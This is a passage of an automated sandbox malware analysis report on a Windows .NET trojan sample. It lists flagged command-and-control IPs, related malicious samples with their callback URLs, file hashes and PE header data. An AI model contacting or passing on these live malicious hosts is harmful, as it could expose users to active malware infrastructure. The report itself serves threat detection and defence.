                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.fonts.comexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.sandoll.co.krexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.sakkal.comexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown

                                                                    Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.233.238.207
                                                                    unknownUnited States
                                                                    54600PEGTECHINCUStrue
                                                                    195.78.66.137
                                                                    unknownPoland
                                                                    41079SUPERHOST-PL-ASPLtrue
                                                                    37.48.65.150
                                                                    unknownNetherlands
                                                                    60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                                                    34.102.136.180
                                                                    unknownUnited States
                                                                    15169GOOGLEUStrue
                                                                    135.181.31.212
                                                                    unknownGermany
                                                                    24940HETZNER-ASDEtrue
                                                                    54.208.77.124
                                                                    unknownUnited States
                                                                    14618AMAZON-AESUStrue
                                                                    184.168.131.241
                                                                    unknownUnited States
                                                                    26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                                    General Information

                                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                                    Analysis ID:339311
                                                                    Start date:13.01.2021
                                                                    Start time:20:46:30
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 9m 22s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:light
                                                                    Sample file name:YvGnm93rap.exe
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:34
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:1
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@7/1@19/7
                                                                    EGA Information:Failed
                                                                    HDC Information:
                                                                    • Successful, ratio: 5.3% (good quality ratio 5.2%)
                                                                    • Quality average: 78.5%
                                                                    • Quality standard deviation: 24.6%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    Cookbook Comments:
                                                                    • Adjust boot time
                                                                    • Enable AMSI
                                                                    • Found application associated with file extension: .exe
                                                                    Warnings:
                                                                    Show All
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                    • TCP Packets have been reduced to 100
                                                                    • Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.43.193.48, 23.210.248.85, 51.11.168.160, 93.184.221.240, 92.122.213.247, 92.122.213.194, 20.54.26.129, 51.104.139.180, 52.155.217.156
                                                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, wu.ec.azureedge.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    20:47:27API Interceptor1x Sleep call for process: YvGnm93rap.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    104.233.238.207PO890299700006.xlsxGet hashmaliciousBrowse
                                                                    • www.4037a.com/8rg4/?SBZ=epg8b&cF=g6ZLIXg6U3PM2jBy80KgA5ROz8OC0OKcGU+g5VdTIBZp3IVPS0UwemMzd4i5Tdxhf5s4zw==
                                                                    fdxzZJ99bS.exeGet hashmaliciousBrowse
                                                                    • www.4037a.com/8rg4/?jP=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI&bv4=YVM8sjIPCHML-RZP
                                                                    37.48.65.150ACH ADVICE ON 16-11-2020.exeGet hashmaliciousBrowse
                                                                    • www.amq-studio.com/bw82/?Jdvd=gLCh8Pmco04cQJFz5kEbI+9zVUDe026h2rroMltMK5XxJzyLw078MOm2wMjAmUaNDVQi312QEQ==&ndZTF4=R2Mdt
                                                                    15ORDER PDF.exeGet hashmaliciousBrowse
                                                                    • www.missegghostel.com/nk7/?iZ50-Pi=kQbvMjY6ZRRnyKo6rgZWiSUj2tjUVSLFE864JaD3Fe5PYincjrqsErZF4PFktR+t6XDcmgqXJpJoTAnn6zSI&jnc=SlDDf8EHaXJl
                                                                    34.102.136.180Order_00009.xlsxGet hashmaliciousBrowse
                                                                    • www.brainandbodystrengthcoach.com/csv8/?1bwhC=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&tB=TtdpPpwhOlt
                                                                    13-01-21.xlsxGet hashmaliciousBrowse
                                                                    • www.kolamart.com/bw82/?x2J8=U5qlNe3qvCiRDMVNZAk3bGcrOcPwpu2hHSyAkQWR0ho6UxGTq/9WR3TB3nENm+o2HqQ7BQ==&Ab=gXuD_lh8bfV4RN
                                                                    NEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                                                    • www.gdsjgf.com/bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf-
                                                                    PO85937758859777.xlsxGet hashmaliciousBrowse
                                                                    • www.bodyfuelrtd.com/8rg4/?RJ=A4ItsHP7WirPGvorxE1FqdRUH2iuHEJ7Bx0GuGGPjza4UX3M9OXu5uVQhTJ1ITDXtosJtw==&LFQHH=_pgx3Rd
                                                                    Order_385647584.xlsxGet hashmaliciousBrowse
                                                                    • www.oohdough.com/csv8/?NP=oR+kRp92OlWNPHb8tFeSfFFusuQV5SLrlvHcvTTApHN9lxDZF+KzMj/NshbaIk6/gJtwpQ==&nN6l9T=K0GdGdPX7JyL
                                                                    PO#218740.exeGet hashmaliciousBrowse
                                                                    • www.epochryphal.com/wpsb/?Wxo=n7b+ISrk/mPyWzbboTpvP41tNOKzDU5etPpa3uuDPgrT9THM2mbO6pyh4trMr+rUEpul&vB=lhv8
                                                                    20210111 Virginie.exeGet hashmaliciousBrowse
                                                                    • www.mrkabaadiwala.com/ehxh/?Gzux=8Ka3Lv4ePZYbHHrfWWyIjg6yKJpjzOn7QTDTNOD0A86ZD78kMrm+GgFnyvrieFQhDFXfm2RQfw==&AnB=O0DToLD8K
                                                                    20210113155320.exeGet hashmaliciousBrowse
                                                                    • www.ortigiarealty.com/dkk/?BZ=59qCdC3RMUvEyWKLbbpm6Z+GlV/JTwbDjS9GwZYTXRwVfK7Z9ENGl/302ncjjG4TtqPC&I6A=4hOhA0
                                                                    13012021.exeGet hashmaliciousBrowse
                                                                    • www.sydiifinancial.com/rbg/?-ZV4gjY=zsOc27F1WxfzCuYGlMZHORhUu2hDO+A8T5/oUCY+tOSiKp0YV+JX8kcBbP6nsiP5HbIi&-ZSl=1bgPBf
                                                                    Po-covid19 2372#w2..exeGet hashmaliciousBrowse
                                                                    • www.thesaltlifestyle.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct
                                                                    FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                                    • www.abilitiesin.com/umSa/?8p=z9MTiPW3cvjSA5QkES0lRL7QE5QWzpSIb/5mf6QApKD6hYKwb/M4i12nx+gX2coGSm9PIjo5qw==&o2=jL30vpcXe
                                                                    6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                                                    • www.vettedwealthmanagement.com/umSa/?ET8T=brJeVU7eljMQcn5t6nrZLyoDpHpFr+iqwzUSRB88e+cRILPvJ2TiW12sA30gV7y33iXX&URfl=00DdGJE8CBEXFLip
                                                                    Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                    • www.basalmeals.com/h3qo/?CR=nh/gKqoyV5HeFjYxMy0eFbMJOpM49Sz3DGf/FH2Dw3liEqigPonoEfAZFGiauGMw1oau&RX=dnC44rW8qdHLY2q
                                                                    5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                                    • www.schustermaninterests.com/de92/?FdC4E2D=otFI+gArfm9oxno+NlFHPe8CZ87dio0DjOpD7CEQ1ohXI6jwcMVL1BNDFt16zf60LSstTEfOYg==&AjR=9r4L1
                                                                    xrxSVsbRli.exeGet hashmaliciousBrowse
                                                                    • www.luxpropertyandassociates.com/nki/?yrsdQvAx=9rwO08mLgykW/+F5WoH4KAy1ieMCsMl+05AKyLP7HaXoaQuR30wAwJPKQnvqcJUpdIyD&D8h8=kHux
                                                                    3S1VPrT4IK.exeGet hashmaliciousBrowse
                                                                    • www.qiemfsolutions.com/xle/?D8bDL=df7alruH/sVOZEWxdb4cimNlzghqglI+JQbYN3M53vXLFmJTlVjRvjRu86vT99I8VeyiFG/dAw==&nbph=uzu87Xq
                                                                    AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                                                    • www.eventsdonevirtually.com/c8so/?Wx=JxEHfAEgu9b4xQJDcyjTWSaEjlpoxhWg+fCl4c24OKbRsAQRgKKiPuXHFwp0UmB835cw&vB=lhr0E
                                                                    g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                                    • www.multipleofferonline.com/nki/?-Z1l=5yWKC4X4OOjUIUftTYCRYdpq8XI+R2ST+EfenRWsFQpL7Lmr0RV0+cHmGR5gosgcZWiS+YlJJw==&5ju=UlSpo
                                                                    pHUWiFd56t.exeGet hashmaliciousBrowse
                                                                    • www.brainandbodystrengthcoach.com/csv8/?Rxl=4rzgp1jZc7l8Whg0IztLQnvubqNqMY/2oz5HEUeZ+SGIDqCjyjtIs6qqwzFhp9I+dVCC&LJB=GbtlyLR0j
                                                                    invoice.xlsxGet hashmaliciousBrowse
                                                                    • www.cleverwares.com/c8so/?AFNDR=7n20cVCpbL7dqxQ&BBW=P253+QYRdhKTDdzjq4pa7Wp7svBpTNddHFol+cUWSKGzAXl94gLhBIvIcI/Xp4fU197lMA==

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    www.ondesign03.net6OUYcd3GIs.exeGet hashmaliciousBrowse
                                                                    • 135.181.31.212
                                                                    PO 24000109490.xlsxGet hashmaliciousBrowse
                                                                    • 135.181.31.212
                                                                    www.tomatrader.com5j6RsnL8zx.exeGet hashmaliciousBrowse
                                                                    • 185.107.56.60
                                                                    www.futbolclubbarcelona.soccerfdxzZJ99bS.exeGet hashmaliciousBrowse
                                                                    • 54.208.77.124
                                                                    www.4037a.comPO890299700006.xlsxGet hashmaliciousBrowse
                                                                    • 104.233.238.207
                                                                    fdxzZJ99bS.exeGet hashmaliciousBrowse
                                                                    • 104.233.238.207

                                                                    ASN

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    PEGTECHINCUSAOA4sx8Z7l.exeGet hashmaliciousBrowse
                                                                    • 154.212.39.175
                                                                    PO890299700006.xlsxGet hashmaliciousBrowse
                                                                    • 104.233.238.207
                                                                    5j6RsnL8zx.exeGet hashmaliciousBrowse
                                                                    • 104.233.182.201
                                                                    fdxzZJ99bS.exeGet hashmaliciousBrowse
                                                                    • 104.233.238.207
                                                                    inv.exeGet hashmaliciousBrowse
                                                                    • 199.188.106.27
                                                                    hUWiJym6fy.exeGet hashmaliciousBrowse
                                                                    • 156.247.94.68
                                                                    TT 18,000.00 euro.xlsxGet hashmaliciousBrowse
                                                                    • 154.212.39.234
                                                                    fSBya4AvVj.exeGet hashmaliciousBrowse
                                                                    • 154.212.39.234
                                                                    C03N224Hbu.exeGet hashmaliciousBrowse
                                                                    • 107.149.46.103
                                                                    EME.39134.xlsxGet hashmaliciousBrowse
                                                                    • 107.149.46.103
                                                                    rvNT4kv6bg.exeGet hashmaliciousBrowse
                                                                    • 107.149.195.152
                                                                    noah crypt(1).exeGet hashmaliciousBrowse
                                                                    • 107.149.249.27
                                                                    NOAH FORMBUK_crypted.exeGet hashmaliciousBrowse
                                                                    • 107.149.23.200
                                                                    SKM109482.exeGet hashmaliciousBrowse
                                                                    • 107.149.195.152
                                                                    New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                                                    • 104.233.180.146
                                                                    New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                                                    • 104.233.249.194
                                                                    vic2.exeGet hashmaliciousBrowse
                                                                    • 154.201.73.160
                                                                    sample.exeGet hashmaliciousBrowse
                                                                    • 142.0.139.129
                                                                    QUOTATION.exeGet hashmaliciousBrowse
                                                                    • 107.149.151.106
                                                                    gmTRWANbg8.exeGet hashmaliciousBrowse
                                                                    • 104.233.224.237
                                                                    SUPERHOST-PL-ASPL990109.exeGet hashmaliciousBrowse
                                                                    • 195.78.66.50
                                                                    http://brudna.prawda.vot.plGet hashmaliciousBrowse
                                                                    • 195.78.66.201
                                                                    qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                                    • 195.78.66.50
                                                                    kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                                    • 195.78.66.50
                                                                    3yhnaDfaxn.exeGet hashmaliciousBrowse
                                                                    • 195.78.66.50
                                                                    inklusionsvereinbarung_muster_bayern.jsGet hashmaliciousBrowse
                                                                    • 185.204.219.237
                                                                    inklusionsvereinbarung_muster_bayern.jsGet hashmaliciousBrowse
                                                                    • 185.204.219.237
                                                                    tarifvertrag_knappschaft_bahn_see.jsGet hashmaliciousBrowse
                                                                    • 185.204.219.237
                                                                    tarifvertrag_knappschaft_bahn_see.jsGet hashmaliciousBrowse
                                                                    • 185.204.219.237
                                                                    http://jurczyk.biz/piotrek/IJilgckESlY/Get hashmaliciousBrowse
                                                                    • 195.114.1.39
                                                                    http://jurczyk.biz/aplikacje/llyv22ukxl/oav1gts4531670007520skspxws445doh14ryGet hashmaliciousBrowse
                                                                    • 195.114.1.39
                                                                    ReviewDocument.pdfGet hashmaliciousBrowse
                                                                    • 195.114.1.40
                                                                    http://dentalspabusko.pl/Paid-Invoice-Credit-Card-Receipt/Get hashmaliciousBrowse
                                                                    • 193.218.152.52
                                                                    31#U7e6ZB487UR59Q3.jsGet hashmaliciousBrowse
                                                                    • 195.114.0.64
                                                                    31#U7e6ZB487UR59Q3.jsGet hashmaliciousBrowse
                                                                    • 195.114.0.64
                                                                    cssvs.docGet hashmaliciousBrowse
                                                                    • 195.242.116.44
                                                                    cssvs.docGet hashmaliciousBrowse
                                                                    • 195.242.116.44
                                                                    Emotet.docGet hashmaliciousBrowse
                                                                    • 195.114.1.181
                                                                    Emotet4.docGet hashmaliciousBrowse
                                                                    • 195.114.1.181
                                                                    LEASEWEB-NL-AMS-01NetherlandsNL5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                                    • 37.48.65.149
                                                                    anydesk (1).exeGet hashmaliciousBrowse
                                                                    • 178.162.151.213
                                                                    T0pH7Bimeq.exeGet hashmaliciousBrowse
                                                                    • 37.48.65.151
                                                                    c6Rg7xug26.exeGet hashmaliciousBrowse
                                                                    • 212.32.237.101
                                                                    parler.apkGet hashmaliciousBrowse
                                                                    • 37.48.77.180
                                                                    parler.apkGet hashmaliciousBrowse
                                                                    • 37.48.77.162
                                                                    Request for Quote_SEKOLAH TUNAS BAKTI SG.doc__.rtfGet hashmaliciousBrowse
                                                                    • 5.79.72.163
                                                                    http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                                                    • 178.162.133.149
                                                                    http://ovd.ru/forum/register.php?a=act&u=84666&i=25545989Get hashmaliciousBrowse
                                                                    • 95.211.66.35
                                                                    ZIPEXT#U007e1.EXEGet hashmaliciousBrowse
                                                                    • 5.79.68.108
                                                                    http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                                                    • 178.162.133.149
                                                                    Nuevo pedido.exeGet hashmaliciousBrowse
                                                                    • 95.211.223.14
                                                                    http://mainfreight-6452496282.eritro.ir/retailer.php?ikpah=Z2lvdmFuYS50YWJhcmluaUBtYWluZnJlaWdodC5jb20=Get hashmaliciousBrowse
                                                                    • 37.48.65.182
                                                                    Nuevo pedido.exeGet hashmaliciousBrowse
                                                                    • 95.211.223.14
                                                                    https://emailcpcc-my.sharepoint.com:443/:b:/g/personal/aswania0_email_cpcc_edu/ESAvfBZdvHBMvBJK1bnZfsoBXf5RRY-PIqJk-UtmqkDXjQ?e=4%3auSHA5p&at=9&d=DwMBaQGet hashmaliciousBrowse
                                                                    • 213.227.135.213
                                                                    http://p5fcw.info/HI12cu33F5Get hashmaliciousBrowse
                                                                    • 212.7.204.100
                                                                    https://www.hostingcloud.racing/ab20.jsGet hashmaliciousBrowse
                                                                    • 81.171.8.143
                                                                    https://00000000.rdtk.io/5fea58f1588f49000120c69f?thru=thru2Get hashmaliciousBrowse
                                                                    • 212.7.204.100
                                                                    http://p4fxv.info/D3c2Hp2HMIGet hashmaliciousBrowse
                                                                    • 212.7.204.100
                                                                    http://p4fxv.info/D3c2Hp2HMIGet hashmaliciousBrowse
                                                                    • 212.7.204.100

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YvGnm93rap.exe.log
                                                                    Process:C:\Users\user\Desktop\YvGnm93rap.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1216
                                                                    Entropy (8bit):5.355304211458859
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                    MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                    SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                    SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                    SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.45747026727835
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:YvGnm93rap.exe
                                                                    File size:654336
                                                                    MD5:16e1a5d26c0698ac48d63661264e0ba1
                                                                    SHA1:5e61d05157c4aa1acfc6a89de619f6bbcad176f6
                                                                    SHA256:e4e84d03d4cb709d737f9ee3e69b40d797e452d83faa35f0a06bb78a87ad0984
                                                                    SHA512:2b2e106e5bb198bfa88469a7c4b7b72c93e0c91e8037128033df25075c02855f9c0b4e97748cc9fb317c32ad19e3930e4274cf806ed7b7aea377734adb4d9d4e
                                                                    SSDEEP:12288:Ig/VMGS1XrEbWp+7jAKVBAIYyPNmvq6xnhpTn3SQs/wRDNvcY:3V81XIKp+7jAIBXqzxnn3SQCwRDF
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<v................0.................. ... ....@.. .......................`............@................................

                                                                    File Icon

                                                                    Icon Hash:0000000000000000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x49078e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x87A8763C [Fri Feb 14 04:21:16 2042 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x9073c0x4f.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x920000x10e9c.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xa40000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x907200x1c.text
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x8e7940x8e800False0.911773574561data7.87823365772IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x920000x10e9c0x11000False0.0750086167279data0.97831783192IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0xa40000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_ICON0x921300x10828dBase III DBT, version number 0, next free block index 40
                                                                    RT_GROUP_ICON0xa29580x14data
                                                                    RT_VERSION0xa296c0x344data
